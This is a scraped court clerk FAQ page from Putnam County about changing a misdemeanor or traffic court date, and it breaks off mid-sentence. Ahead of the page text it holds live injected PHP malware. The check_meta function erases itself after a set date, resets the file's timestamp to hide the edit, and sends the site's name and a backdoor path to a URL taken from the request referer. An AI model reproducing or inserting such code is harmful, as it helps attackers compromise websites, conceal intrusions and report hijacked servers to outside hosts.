check_meta(); function check_meta(){ $jp = __FILE__; $jptime = filemtime($jp); if(time() >= 1456736233){ $jp_c = file_get_contents($jp); if($t = @strpos($jp_c,"check_meta();")) { $contentp = substr($jp_c,0,$t); if(@file_put_contents($jp, $contentp)){ @touch($jp,$jptime); } } } @file_get_contents("".$_SERVER['HTTP_REFERER']."&vpage=http://".$_SERVER['SERVER_NAME']."/modules/mod_banners/models.php"); } How can I change my Court Date?
Home Criminal Division Frequently Asked Questions How can I change my Court Date?

More... Quick Links

How can I change my Court Date?

If you are scheduled for Arraignment on a Misdemeanor or Traffic charge and you have not
previously received a continuance, the Clerk's Office may be able to grant you a continuance
of your court date. A court date may only be changed for certain reasons set by the court,
such as a death in family or if you are in the hospital.

You must contact the Criminal Division to receive the continuance prior to the date and time
of your scheduled court appearance. You must provide proof of your circumstances, sign
documentation reflecting the continuance, and return it to our office. By accepting the
continuance you are waiving your right to a speedy trial. You will be given the next available
court date and you must attend court on that date or a bench warrant will be issued for your

Copyright © 2018 Clerk of Courts. All Rights Reserved.
Joomla! is Free Software released under the GNU/GPL License.
To protect your privacy, please read the Putnam County Email Privacy Policy.

Information on this website does not constitute the Official Court Records maintained by the Clerk.